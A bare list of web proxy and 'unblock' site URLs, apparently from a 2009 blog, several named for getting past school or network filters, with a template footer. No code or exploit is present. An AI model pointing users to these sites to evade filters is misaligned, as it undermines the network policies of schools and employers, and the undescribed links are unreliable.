http://www.totprox.info/
http://visit4free.info
http://ipmagic.info
http://fastb.info
http://usurfer.info
http://www.anonywe.co.cc/
http://www.anonymose.co.cc/
http://iwannasurf.co.cc
http://brows3.co.cc
http://fastunblock.co.cc
http://lleu.info
http://designerspecials.net
http://designeritems.net
http://pixelspace4u.com
http://aiel.info
http://gixsr.com
http://stashme.info
http://bypass.it.cx
http://unblockbypass.org
http://boringschool.info
http://www.proxynyc.com
http://www.surf101.tk/
http://lasersmokingstop.info/
http://proxy.org/
http://iproxx.com
http://ripback.info
http://stage6.info
http://pseudosurfer.com
http://HideUs.org
http://anonoxy.com
http://cbrowse.info
http://sneakyjoe.com
http://HiddenPort.info
http://fastestwebproxy.com/
https://www.proxify.com
http://www.aussieproxy.info
 

...IT IS CRACKER'S GENERATION....!! Blak Magik is Designed by productive dreams for smashing magazine Bloggerized by Ipiet © 2009